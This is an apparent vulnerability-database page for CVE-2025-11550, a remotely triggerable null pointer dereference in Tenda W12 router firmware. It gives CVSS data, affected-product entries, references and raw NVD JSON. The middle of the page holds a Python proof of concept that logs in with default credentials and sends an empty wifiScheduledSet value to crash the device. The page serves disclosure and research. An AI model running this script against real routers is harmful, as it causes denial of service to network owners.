CVE-2025-11550

Description

A vulnerability was found in Tenda W12 3.0.0.6(3948). The impacted element is the function wifiScheduledSet of the file /goform/modules of the component HTTP Request Handler. The manipulation of the argument wifiScheduledSet results in null pointer dereference. The attack may be performed from remote. The exploit has been made public and could be used.

CVSS Details

CVSS Score

6.5

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:o:tenda:w12_firmware:3.0.0.6\(3948\):*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:tenda:w12:3.0:*:*:*:*:*:*:* - NOT VULNERABLE

Tenda W12 3.0.0.6(3948)

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-11550 PoC - Tenda W12 Null Pointer Dereference
# Vulnerability: Null Pointer Dereference in wifiScheduledSet function
# Affected: Tenda W12 3.0.0.6(3948)
# File: /goform/modules

import requests

# Target device configuration
TARGET_IP = "192.168.0.1"  # Default Tenda router IP
TARGET_PORT = 80
TARGET_URL = f"http://{TARGET_IP}:{TARGET_PORT}/goform/modules"

# Authentication credentials (low privilege required)
# Use default or known credentials
USERNAME = "admin"
PASSWORD = "admin"

def exploit():
    """
    Trigger null pointer dereference by sending crafted wifiScheduledSet parameter.
    The manipulation of the wifiScheduledSet argument causes the device to crash.
    """
    session = requests.Session()

    # Step 1: Login to the router (low privilege access)
    login_url = f"http://{TARGET_IP}:{TARGET_PORT}/login/Auth"
    login_data = {
        "username": USERNAME,
        "password": PASSWORD
    }

    try:
        session.post(login_url, data=login_data, timeout=5)
    except Exception as e:
        print(f"Login attempt: {e}")

    # Step 2: Send crafted request to trigger null pointer dereference
    # The wifiScheduledSet parameter is manipulated to cause NULL dereference
    payload = {
        "module": "wifi",
        "wifiScheduledSet": ""  # Empty or malformed value triggers the bug
    }

    try:
        response = session.post(
            TARGET_URL,
            data=payload,
            timeout=10,
            headers={"Content-Type": "application/x-www-form-urlencoded"}
        )
        print(f"Response status: {response.status_code}")
    except requests.exceptions.RequestException as e:
        print(f"Request failed (device may have crashed): {e}")
        print("Exploit successful - device likely crashed due to NULL pointer dereference")

if __name__ == "__main__":
    exploit()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-11550
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-11550
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-11550/
[4] VulDB https://vuldb.com/cve/CVE-2025-11550
[5] https://github.com/z472421519/BinaryAudit/blob/main/PoC/NPD/Tenda_W12/cgiWifiScheduledSet/cgiWifiScheduledSet.md
[6] https://vuldb.com/?ctiid.327709
[7] https://vuldb.com/?id.327709
[8] https://vuldb.com/?submit.670118
[9] https://www.tenda.com.cn/
[10] https://github.com/z472421519/BinaryAudit/blob/main/PoC/NPD/Tenda_W12/cgiWifiScheduledSet/cgiWifiScheduledSet.md

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-11550", "sourceIdentifier": "[email protected]", "published": "2025-10-09T18:15:48.610", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was found in Tenda W12 3.0.0.6(3948). The impacted element is the function wifiScheduledSet of the file /goform/modules of the component HTTP Request Handler. The manipulation of the argument wifiScheduledSet results in null pointer dereference. The attack may be performed from remote. The exploit has been made public and could be used."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.7, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 3.6}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:N/I:N/A:C", "baseScore": 6.8, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "COMPLETE"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 8.0, "impactScore": 6.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-404"}, {"lang": "en", "value": "CWE-476"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-476"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:tenda:w12_firmware:3.0.0.6\\(3948\\):*:*:*:*:*:*:*", "matchCriteriaId": "5A053AC4-B48D-4733-B713-50F8CA2958A3"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:tenda:w12:3.0:*:*:*:*:*:*:*", "matchCriteriaId": "15F1B9C0-B862-4659-AD74-5CE8D7B396A1"}]}]}], "references": [{"url": "https://github.com/z472421519/BinaryAudit/blob/main/PoC/NPD/Tenda_W12/cgiWifiScheduledSet/cgiWifiScheduledSet.md", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.327709", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.327709", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.670118", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://www.tenda.com.cn/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/z472421519/BinaryAudit/blob/main/PoC/NPD/Tenda_W12/cgiWifiScheduledSet/cgiWifiScheduledSet.md", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Third Party Advisory"]}]}}